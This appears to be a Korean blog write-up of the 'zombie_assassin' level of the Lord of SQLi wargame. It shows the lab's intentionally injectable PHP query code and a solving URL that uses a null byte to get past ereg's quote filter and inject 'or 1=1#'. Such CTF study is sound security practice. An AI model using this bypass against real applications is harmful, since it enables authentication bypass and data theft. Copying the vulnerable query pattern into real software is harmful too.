<?php
include "./config.php";
login_chk();
dbconnect();
if(preg_match('/\\\|prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/\\\|prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(@ereg("'",$_GET[id])) exit("HeHe");
if(@ereg("'",$_GET[pw])) exit("HeHe");
$query = "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) solve("zombie_assassin");
highlight_file(__FILE__);
?>
$_GET[id], $_GET[pw] 필터
\
prob
_
.
()
싱글쿼터(')
ereg 함수 취약점을 이용해 우회
https://los.eagle-jump.org/zombie_assassin_14dfa83153eb348c4aea012d453e9c8a.php?id=%00%27or%201=1%23
'WEB Hacking > Lord of SQLi' 카테고리의 다른 글
[los] nightmare :: auto type cast (0) | 2018.09.18 |
---|---|
[los] succubus (0) | 2018.09.17 |
[los] assassin (0) | 2018.09.17 |
[los] giant (0) | 2018.09.17 |
[los] bugbear (0) | 2018.09.17 |